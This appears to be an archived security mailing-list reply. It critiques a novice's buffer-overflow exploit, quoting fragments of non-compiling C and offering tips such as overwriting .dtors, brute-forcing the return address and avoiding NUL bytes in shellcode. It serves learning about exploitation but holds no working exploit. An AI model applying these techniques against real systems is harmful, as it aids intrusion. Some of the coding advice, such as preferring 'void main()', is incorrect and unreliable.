Re: Why this wont work

[joe <moj0e () terra com br>]

Well, for various reasons...
The first being that your exploit doesn't even compile.


> main (void) {
> char buffer[1032]; /* 1024 + 8 */
> int offset,i,ret;
> char *ptr,*ptr2; 


Things such as main() void when it should be void main() .

> help () {
> fprintf ("Usage: %s <offset>\n",argv[0]);
> exit(0);
> } 


Function declarations inside main....

> for (i=0;i<strlen(buffer);i++) {
>   buffer[i]=0x00;
>     } 


Putting NULLs into a shellcode is a major no-no. NULL= 0x00

Probably a couple of other reasons too.
I think _(but not sure)_ that since there is no printf or something 
after your strcpy, that you have to overwrite .dtors section.
AND if you are using gcc > 2.95 (or something like that) it wont work.

Another thing that will help you, is if you overflow 100 more than 
necessary (instead of just 8).
And last thing that I can think of... It appears to me that you are 
using shell code that will run a shell
Sometimes it is necessary to use shellcode that will just execute a 
program... instead of prompting for a shell.
Also... sometimes shellcode can be specific to the computer you are 
running (because of addresses).

You might also have to brute force your return address... movl %esp,%eax 
might not be enough.

Have fun coding!!

Try reading smashing the stack for fun and profit and any other buffer 
overflow paper you can get a hold of.

A good wargame that will help you learn to write exploits can be found at:
http://kamikaza.ffk.hr/wargame/